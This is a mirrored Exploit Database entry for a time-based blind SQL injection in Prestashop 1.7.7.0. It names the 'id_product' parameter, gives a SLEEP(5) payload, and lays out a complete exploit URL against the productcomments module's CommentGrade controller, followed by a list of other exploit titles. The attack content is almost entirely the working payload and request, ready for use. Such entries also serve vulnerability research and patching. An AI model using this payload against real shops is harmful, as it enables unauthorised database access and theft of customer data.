Prestashop 1.7.7.0 – ‘id_product’ Time Based Blind SQL Injection

Exploit Database
41 阅读

作者： Jaimin Gondaliya

日期： 2021-01-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49410/

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

last Exploits
Prestashop 1.7.7.0 – ‘id_product’ Time Based Blind SQL Injection的更多信息

4images 1.9 – Remote Command Execution (RCE)：
SOA School Management 3.0 – SQL Injection：
Hexjector 1.0.7.2 – Persistent Cross-Site Scripting：
net2ftp 0.98 (stable) – ‘/admin1.template.php’ Local/Remote File Inclusion：
GeniXCMS 0.0.1 – Multiple Vulnerabilities：
FLEX 1085 Web 1.6.0 – HTML Injection：
Arteco Web Client DVR/NVR – ‘SessionId’ Brute Force：
Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload：